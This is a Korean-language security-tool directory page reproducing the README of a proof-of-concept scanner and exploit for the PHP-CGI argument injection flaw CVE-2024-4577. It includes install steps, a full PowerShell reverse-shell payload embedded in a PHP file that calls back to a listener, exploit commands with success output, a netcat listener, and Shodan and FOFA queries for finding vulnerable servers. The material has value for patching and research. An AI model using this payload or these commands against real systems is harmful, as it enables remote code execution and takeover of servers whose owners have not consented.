Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2024-4577-RCE — PoC - PHP CGI Argument Injection CVE-2024-4577 (Scanner and Exploit) | Kitploit
도구/GitHubGitHub/l0n3m4n/cve-2024-4577-rce
Vulnerability ScannersExploitationWeb Application ExploitationPenetration TestingRed TeamingPayload Development
GitHubl0n3m4n/cve-2024-4577-rce

CVE-2024-4577-RCE

PoC - PHP CGI Argument Injection CVE-2024-4577 (Scanner and Exploit)

저장소 보기
712년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

PHP CGI 인수 주입 (CVE-2024-4577) RCE

Facebook X Medium Python Kali

📜 설명

PHP 8.1.* (8.1.29 미만), 8.2.* (8.2.20 미만), 8.3.* (8.3.8 미만) 버전에서 Windows에서 Apache와 PHP-CGI를 사용하는 경우, 시스템이 특정 코드 페이지를 사용하도록 설정되어 있으면 Windows가 Win32 API 함수에 전달된 명령줄에서 문자를 대체하기 위해 "Best-Fit" 동작을 사용할 수 있습니다. PHP CGI 모듈이 이러한 문자를 PHP 옵션으로 잘못 해석하여, 악의적인 사용자가 실행 중인 PHP 바이너리에 옵션을 전달할 수 있게 되어 스크립트의 소스 코드를 유출하거나 서버에서 임의의 PHP 코드를 실행하는 등의 동작이 가능해집니다.

"XAMPP는 기본 구성에서 취약하며, /php-cgi/php-cgi.exe 엔드포인트를 대상으로 삼을 수 있습니다. 명시적인 .php 엔드포인트(예: /index.php)를 대상으로 하려면 서버가 CGI 모드에서 PHP 스크립트를 실행하도록 구성되어 있어야 합니다."

📚 목차

  • 📜 설명
  • 🛠️ 설치
  • ⚙️ 사용법
  • 💁 참조

🛠️ 설치

root@kitploit:~
$ git clone https://github.com/l0n3m4n/CVE-2024-4577-RCE.git
$ cd CVE-2024-4577-RCE && pip install -r requirements.txt 

⚙️ 사용법

php-cge

🤍 리버스 셸 확보

PHP 페이로드

[!NOTE] 이 도구는 실제 공격 및 기술(TTP)을 시연합니다. 그러나 이 특정 페이로드 샘플은 이 시나리오에서 작동하지 않습니다. 완전히 작동하는 페이로드를 얻으려면 shell.php를 수정하십시오.

root@kitploit:~
# rev_shell.php
<?php
$payload = "powershell -c \"\$client = New-Object System.Net.Sockets.TCPClient('192.168.56.100', 9001);\$stream = \$client.GetStream();[byte[]]\$bytes = 0..65535|%{0};while((\$i = \$stream.Read(\$bytes, 0, \$bytes.Length)) -ne 0){;\$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$bytes,0, \$i);\$sendback = (iex \$data 2>&1 | Out-String );\$sendback2 = \$sendback + 'PS ' + (pwd).Path + '> ';\$sendbyte = ([text.encoding]::ASCII).GetBytes(\$sendback2);\$stream.Write(\$sendbyte,0,\$sendbyte.Length);\$stream.Flush()};\$client.Close()\";

exec($payload);
?>
 

🖥️ 서버 스캔

root@kitploit:~
$ python3 CVE-2024-4577.py -s -t https://target.com/  
                                                   
 _____ _____ _____ _____ _____ _____                 _____       _         _   
|  _  |  |  |  _  |     |   __|     |___ ___ ___ ___|     |___  |_|___ ___| |_ 
|   __|     |   __|   --|  |  |-   -|___| .'|  _| . |-   -|   | | | -_|  _|  _|
|__|  |__|__|__|  |_____|_____|_____|   |__,|_| |_  |_____|_|_|_| |___|___|_|  
                                                |___|         |___|            
        Author: l0n3m4n | CVE-2024-4577 | PoC and Scanner                      
    
[+] Target https://target.com is vulnerable to CVE-2024-4577

🎯 취약 서버 공격

root@kitploit:~
$ python3 CVE-2024-4577.py -t http://example.com -e -p rev_shell.php
                                                   
 _____ _____ _____ _____ _____ _____                 _____       _         _   
|  _  |  |  |  _  |     |   __|     |___ ___ ___ ___|     |___  |_|___ ___| |_ 
|   __|     |   __|   --|  |  |-   -|___| .'|  _| . |-   -|   | | | -_|  _|  _|
|__|  |__|__|__|  |_____|_____|_____|   |__,|_| |_  |_____|_|_|_| |___|___|_|  
                                                |___|         |___|            
        Author: l0n3m4n | CVE-2024-4577 | PoC and Scanner  

[+] Exploit successful!

👨🏻‍💻 Netcat 리스너

root@kitploit:~
$ nc -lvnp 9001

🔍 취약 호스트 탐지

  • Shodan: server: PHP 8.1, server: PHP 8.2, server: PHP 8.3
  • FOFA: protocol="http" && header="X-Powered-By: PHP/8.1" || header="X-Powered-By: PHP/8.2" || header="X-Powered-By: PHP/8.3"

💁 참조

  • https://labs.watchtowr.com/no-way-php-strikes-again-cve-2024-4577
  • https://raw.githubusercontent.com/projectdiscovery/nuclei-templates/main/http/cves/2024/CVE-2024-4577.yaml
  • http://www.openwall.com/lists/oss-security/2024/06/07/1
  • https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/windows/http/php_cgi_arg_injection_rce_cve_2024_4577.rb
  • https://www.php.net/ChangeLog-8.php#8.1.29
  • https://www.php.net/ChangeLog-8.php#8.2.20
  • https://www.php.net/ChangeLog-8.php#8.3.8

⚠️ 면책 조항

이 도구는 교육 및 연구 목적으로만 제공됩니다. 제작자는 이 도구의 오용이나 그로 인한 손해에 대해 어떠한 책임도 지지 않습니다. 이슈 생성

도구 다운로드